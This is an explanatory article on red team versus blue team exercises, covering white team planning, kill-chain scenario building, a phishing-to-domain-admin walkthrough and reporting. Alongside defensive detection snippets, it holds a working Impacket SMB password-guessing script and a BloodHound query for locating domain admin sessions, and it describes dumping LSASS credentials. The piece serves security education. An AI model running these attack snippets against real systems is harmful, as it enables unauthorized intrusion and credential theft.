Cybersecurity experts fill our days with terminology borrowed from warfare, including jargon such as red team versus blue team. The concept of a ‘red team’ has its origin in wargaming: the red team plays the opposing force and attempts to bypass the defenses of the defending, or blue, team.
These exercises are not about winning or losing. They help hedge against unpleasant surprises and are a safe way for organizations to test their resilience against attacks.
The exercises highlight weaknesses in defenses and reveal misconceptions or flaws in attack detection. Red team testing, or ethical hacking, does not solely focus on testing technology. It also attempts to find loopholes in processes and weaknesses in how people interact with computer systems.
Needless to say, the experts don’t kick off a red team versus blue team exercise at random. They follow a carefully designed plan. In fact, a red team engagement, or ethical hacking, is not just ‘executing an attack’: teams often spend more time planning the scenarios than on the attack itself.
Red Team Versus Blue Team Pre-Engagement
In the first phase, the blue team stays in the dark. Another actor gets involved: the white team. The members of the white team are the only people who know about the red team exercise. The team includes the chief information security officer (CISO) and subject matter experts in the areas being tested.
The white team referees the engagement and ensures the exercise runs fairly and does not cause operational problems. The white team agrees with the red team on the scope, the timing and the rules of engagement.
As a last step, the white team confirms the composition of the red team, and the teams agree on a single point of contact in case of problems. If the exercise has physical components, the teams also agree on a so-called ‘get-out-of-jail’ letter. The red team uses this document, if they get caught, to prove that the organization sanctioned the exercise.
Reconnaissance of the Victim
Once the teams have set the scope, the red team gathers intelligence on the victim and on the sector or business the victim operates in. This allows them to build a footprint of their future target and decide on possible entry points. If the scope permits, the footprint can be extended with a map of the other organizations the victim frequently interacts with. The attackers can abuse these trusted connections to gain access to the victim.
Although the red team is now eager to start its attack, there’s one more phase to go through.
Red Team Scenario Building
The goal of the whole exercise is to be as realistic as possible. So, the red team researches the threat actors known to have targeted the victim or the sector in which the victim operates. They explore the typical tactics, techniques and procedures (TTPs) employed by these threat actors. The objective is to present a credible picture of the threats the victim is facing, based on real-world examples.
More advanced red teams can execute this phase alongside specific intelligence providers. The TIBER-EU Framework includes space for an external provider to compile the threat intelligence on a victim and deliver it to the red team so they can use it.
Armed with the TTPs, the red team develops a plan. To be successful, the red team maps a chain of techniques onto a model, for example the Unified Cyber Kill Chain. This allows them to find their way from initial access to their final objectives, hidden deep in the victim’s network.
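To make this concrete, here is a minimal sketch of how such a mapping might be recorded. The phases and MITRE ATT&CK technique IDs reflect the scenario walked through in this article; the structure itself is purely illustrative, not part of any framework.

```python
# Illustrative sketch: mapping a planned scenario onto kill-chain phases,
# annotated with the corresponding MITRE ATT&CK technique IDs.
attack_plan = {
    "initial_access": [("Spearphishing Attachment", "T1566.001")],
    "privilege_escalation": [("Password Guessing (local admin)", "T1110.001")],
    "lateral_movement": [("SMB/Windows Admin Shares", "T1021.002")],
    "credential_access": [("LSASS Memory Dump", "T1003.001")],
    "actions_on_objectives": [("Valid Accounts: Domain Accounts", "T1078.002")],
}

for phase, techniques in attack_plan.items():
    for name, attack_id in techniques:
        print(f"{phase:>24}: {name} ({attack_id})")
```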
Once the plan is compiled and approved, the red team deploys the required infrastructure and starts running the attack.
Attack Delivery
In this phase, the red team gets their hands dirty and can show off their skills.
Red Team Versus Blue Team: Initial Foothold
A common attack scenario for an initial foothold consists of sending a phishing email and luring a user into opening an infected document. Remember we mentioned mapping trusted connections? Pretending to be someone from an organization the victim often works with is an easy and proven way to convince a user to open a document. From a blue team perspective, this is not easy to defend against. A red team will often not use an ‘off-the-shelf’ malicious document, which means mail filtering and antivirus software are less likely to detect the attack.
Depending on what the red team does, the blue team can pick up early signals of the attack. Emails from newly registered domains or domains with uncommon digital certificates might tip them off that something strange is happening.
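To illustrate that kind of early signal, here is a minimal, hypothetical sketch of a check for newly registered sender domains. It assumes the python-whois package and a list of sender domains pulled from mail logs; the domains and the age threshold are placeholders.

```python
# Minimal sketch (assumes the python-whois package: pip install python-whois).
# Flags sender domains whose WHOIS creation date is suspiciously recent.
from datetime import datetime, timedelta
import whois  # python-whois

MAX_AGE_DAYS = 30  # hypothetical threshold for "newly registered"

def is_newly_registered(domain: str) -> bool:
    record = whois.whois(domain)
    created = record.creation_date
    # python-whois may return a list when multiple creation dates are present
    if isinstance(created, list):
        created = min(created)
    if created is None:
        return False  # no data available; don't flag
    return datetime.now() - created < timedelta(days=MAX_AGE_DAYS)

# Example: sender domains extracted from inbound mail headers (placeholder values)
for sender_domain in ["example-supplier.com", "examp1e-supplier.com"]:
    if is_newly_registered(sender_domain):
        print(f"Possible phishing infrastructure: {sender_domain}")
```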
Local Administrator
Some businesses and agencies boost their defenses with Endpoint Detection and Response (EDR) solutions. These assist blue teams by highlighting (and sometimes blocking) the odd activity that results from opening a malicious document. For example, the attackers might send a Word document that, once macros are enabled, launches an instance of PowerShell. Under normal circumstances, a Word process will not launch a scripting engine. This is something the blue team can look for, or be notified of. However, many organizations do not have EDR. Luckily for our attack scenario, this is also the case with our victim.
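For blue teams that do collect this telemetry, a simplified sketch of such a check is shown below. It assumes process-creation events (for example, Sysmon Event ID 1) have already been parsed into dictionaries; the field names are illustrative, not any real EDR schema.

```python
# Simplified sketch: flag scripting engines spawned by Office applications.
# Assumes process-creation telemetry (e.g. Sysmon Event ID 1) already parsed
# into dicts; the field names below are illustrative placeholders.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

def suspicious_child_process(event: dict) -> bool:
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    child = event.get("image", "").lower().rsplit("\\", 1)[-1]
    return parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN

# Example event: Word launching PowerShell after macros are enabled
event = {
    "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
}
if suspicious_child_process(event):
    print("Alert: Office application spawned a scripting engine")
```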
Once the red team installs the malicious code and infects the workstation, they attempt to gain higher privileges. The malware gives them the privileges of a normal user; now they want the privileges of a local administrator. Many organizations use local admin accounts for IT maintenance or have them as part of a default installation, and the red team can use these accounts to gain access to other workstations. The red team has a simple attack technique to obtain these credentials: brute-forcing.
Brute-Forcing
Armed with a word list built from keywords gathered during the earlier reconnaissance and scenario-building phases, the red team attempts to guess the password of a local admin. Sure enough, it doesn’t take long for the team to discover a working username and password. This gives them local admin access to the workstation.
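Purely as an illustration, here is a minimal sketch of what this password guessing could look like over SMB, using Impacket’s SMBConnection. The target host, account name and word list are placeholders for values gathered during reconnaissance.

```python
# Minimal sketch of local-admin password guessing over SMB.
# Assumes the impacket library (pip install impacket); the host, username and
# word list are placeholders.
from impacket.smbconnection import SMBConnection, SessionError

target = "10.0.0.15"            # hypothetical workstation
username = "localadmin"         # hypothetical local admin account
wordlist = ["Winter2024!", "CompanyName123", "Welcome01"]

for password in wordlist:
    try:
        conn = SMBConnection(target, target)
        conn.login(username, password)   # local account, no domain
        print(f"Valid credentials found: {username}:{password}")
        conn.logoff()
        break
    except SessionError:
        continue  # wrong password, try the next candidate
```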
In many cases, the blue team will be blind to this part of the attack. Local authentication attempts are often not logged centrally, so the blue team will not detect them.
Network Propagation
Now that they have wider access, the red team will focus on workstations where a domain admin is logged in. Especially in larger environments, finding such workstations can be challenging and time-consuming. It’s also a chance for the blue team to spot the attack. The red team must not despair, though. As it happens, there is a tool that makes this step easier: BloodHound.
With BloodHound, the red team can automate the process of finding workstations with domain admin sessions. At this stage, the blue team can showcase how they prepared for this type of attack. The blue team has a set of decoy users. Any attempt to use these decoy users is logged and alerted to the blue team. When the blue team discovers this, they inform the CISO.
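To picture the red team’s side of this step: such a hunt is typically expressed as a Cypher query against BloodHound’s Neo4j database. Below is a minimal sketch using the neo4j Python driver; the connection details, credentials and query are placeholders to adapt to the environment at hand.

```python
# Minimal sketch: query the BloodHound Neo4j database for computers that have
# an active session from a member of Domain Admins. Connection details and
# credentials are placeholders.
from neo4j import GraphDatabase

QUERY = """
MATCH (c:Computer)-[:HasSession]->(u:User)-[:MemberOf*1..]->(g:Group)
WHERE g.objectid ENDS WITH '-512'  // RID 512 = Domain Admins
RETURN c.name AS computer, u.name AS admin
"""

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "bloodhound"))
with driver.session() as session:
    for record in session.run(QUERY):
        print(f"{record['admin']} has a session on {record['computer']}")
driver.close()
```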
The CISO, as part of the white team, informs the red team’s liaison that their intrusion has been detected. This is, however, not the end of the exercise. Instead of letting the blue team contain the intrusion and evict the red team from the environment, the white team instructs the blue team to stand down and tells the red team to proceed with their attack scenario and obtain domain admin credentials.
Actions on Objectives
The BloodHound results give the red team the attack path they need to follow. The graph indicates a workstation with a domain administrator currently logged in. The team uses the previously obtained local administrator credentials to gain access to this workstation. Once inside, they dump the memory of the Windows process that holds the domain administrator’s login credentials. This finally brings them to their objective: domain administrator credentials for the victim’s domain.
A note on actions on objectives: the objectives of a real threat actor rarely end with obtaining domain administrator credentials. Rather, they use these credentials to access sensitive information or to commit sabotage or fraud.
Analysis and Reporting: After the Ethical Hacking
The red team exercise does not stop with demonstrating that the team reached the objective. Instead, they give a full report detailing the execution of the scenario, the findings and the recommendations. The report includes:
- The attack scenario and the used techniques, with the results (proof) of the execution of these techniques
- A set of findings, or weaknesses, discovered during the exercise that allowed the red team to progress
- A risk rating of these findings and their potential impact. The report details how they can be mitigated. It also documents how the blue team can improve detection for these techniques.
- A roadmap with recommendations on which findings to resolve first. Resolving one weakness can sometimes limit the impact of other, related weaknesses.
- Advice on areas for improvement in terms of technical controls, policies and procedures, and education and awareness
- Guidelines for the blue team on how to replay the attack scenario, after the improvements have been implemented.
In this final step, it’s time to introduce yet another actor: the green team. In most organizations, it is not the blue team that oversees the security improvements, but the green team. This team removes weaknesses or puts mitigating controls in place. They also take care of improved logging capabilities and assist the blue team with automation and alerting on unusual activity.
There’s one more color we have to cover: the purple team. A purple team is not a separate actor; it describes the structured interaction between the offensive side and the defensive side, with the goal of improving the blue team’s detection and response capabilities.
After all, cybersecurity language isn’t short of colorful jargon. And it takes all of these teams to run an exercise that teaches the organization how to defend itself better.